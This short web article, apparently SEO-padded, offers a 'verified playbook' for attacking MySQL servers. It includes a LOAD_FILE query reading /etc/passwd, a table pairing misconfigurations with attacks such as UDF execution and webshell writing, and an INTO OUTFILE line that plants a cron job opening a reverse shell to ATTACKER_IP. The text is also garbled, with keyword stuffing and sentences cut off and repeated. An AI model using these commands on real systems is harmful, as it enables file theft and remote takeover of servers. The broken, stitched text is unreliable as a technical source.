If the MySQL user has the FILE privilege and the secure_file_priv configuration allows it (or is empty), you can read arbitrary files from the server's disk using a standard SELECT statement.
The "HackTrick":
You don't need to load data into a table; you can load it directly into a result set using LOAD_FILE().
SELECT LOAD_FILE('/etc/passwd');
Why it's interesting:
| Misconfiguration | Attack |
|----------------|--------|
| secure_file_priv='' | File read/write anywhere |
| plugin_dir writable | UDF execution |
| root with empty password | Full control |
| FILE privilege granted to web app user | Write webshell |
| Log files in web-accessible dir | Write query logs containing PHP |
In the world of cybersecurity, information is abundant, but accuracy is scarce. When searching for mysql hacktricks verified, you are not looking for theoretical vulnerabilities or outdated exploits. You are looking for battle-tested commands, bypasses, and privilege escalation paths that work against real-world MySQL and MariaDB deployments. mysql hacktricks verified
This article serves as a verified playbook. Every technique listed—from user-defined function (UDF) injection to reading files via LOAD DATA LOCAL INFILE—has been tested against MySQL versions 5.7, 8.0, and compatible MariaDB forks. Whether you have SQL injection or direct database access, this guide will help you pivot, escalate, and exfiltrate.
SELECT "* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" INTO OUTFILE '/etc/cron.d/reverse';
If secure_file_priv is set (prevents INTO OUTFILE/LOAD_FILE outside certain dirs), check its value: If the MySQL user has the FILE privilege
SHOW VARIABLES LIKE 'secure_file_priv';
Bypass? Usually no, but misconfigured AppArmor/SELinux might allow writes elsewhere.
This is the core of mysql hacktricks verified. We assume you have a low-privilege SQL user (e.g., from SQLi or default credentials like root:root). Why it's interesting: | Misconfiguration | Attack |
Ivory Line © 2026